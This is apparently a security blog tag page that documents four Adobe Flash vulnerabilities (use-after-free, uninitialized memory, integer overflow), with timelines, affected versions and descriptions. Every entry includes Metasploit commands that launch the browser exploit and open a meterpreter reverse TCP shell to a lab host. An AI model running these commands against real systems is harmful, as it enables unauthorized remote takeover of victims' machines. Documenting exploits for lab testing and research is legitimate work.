Tag Archives: Adobe Flash

CVE-2015-0311 Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free

Timeline :

Vulnerability discovered exploited in the wild the 2015-01-21
Patched by the vendor the 2015-01-22
Metasploit PoC provided the 2015-03-09

PoC provided by :

Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0311
APSA15-01

Affected version(s) :

Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh
Adobe Flash Player 13.0.0.262 and earlier 13.x versions
Adobe Flash Player 11.2.202.438 and earlier versions for Linux

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash Player 16.0.0.287

Description :

This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on:
* Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Flash 11.2.202.424.

Commands :

use exploit/multi/browser/adobe_flash_uncompress_zlib_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2015-0359 Adobe Flash Player domainMemory ByteArray Use After Free

Timeline :

Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor the 2015-04-14
Vulnerability discovered integrated into exploit kit the 2015-04-17
PoC provided by unknown and hdarwin the 2015-05-02
Metasploit PoC provided the 2015-05-08

PoC provided by :

bilou
Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0359
APSB15-06

Affected version(s) :

Adobe Flash Player 17.0.0.134 and earlier versions

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134

Description :

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Commands :

use exploit/windows/browser/adobe_flash_domain_memory_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

llowfullscreen=”allowfullscreen”>

CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Timeline :

Vulnerability discovered by bilou and reported to Verisign’s iDefense VCP
Vulnerability reported to the vendor by Verisign’s iDefense VCP the 2014-09-03
Patched by the vendor via APSB14-24 the 2014–11-11
Vulnerability reported integrated into exploit kits the 2014-11-20
Metasploit PoC provided the 2015–04-30

PoC provided by :

Nicolas Joly (bilou ?)
Unknown
juan vazquez

Reference(s) :

CVE-2014-8440
APSB14-24

Affected version(s) :

Adobe Flash Player 15.0.0.189 and earlier versions
Adobe Flash Player 13.0.0.250 and earlier 13.x versions
Adobe Flash Player 11.2.202.411 and earlier versions for Linux
Adobe AIR desktop runtime 15.0.0.293 and earlier versions
Adobe AIR SDK 15.0.0.302 and earlier versions
Adobe AIR SDK & Compiler 15.0.0.302 and earlier versions
Adobe AIR 15.0.0.293 and earlier versions for Android

Tested on :

with Adobe Flash Player 15.0.0.189 and Internet Explorer 11 on Windows 7 SP1

Description :

This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0569 Adobe Flash Player casi32 Integer Overflow

Timeline :

Vulnerability discovered by bilou and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2014-09-10
Patched by the vendor via APSB14-22 the 2014–10-14
Vulnerability reported integrated into exploit kits the 2014-10-21
Metasploit PoC provided the 2015–04-10

PoC provided by :

bilou
juan vazquez

Reference(s) :

CVE-2014-0569
APSB14-22
ZDI-14-365

Affected version(s) :

Adobe Flash Player 15.0.0.167 and earlier versions

Tested on :

with Adobe Flash Player 15.0.0.167 and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.

Commands :

use exploit/windows/browser/adobe_flash_casi32_int_overflow
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo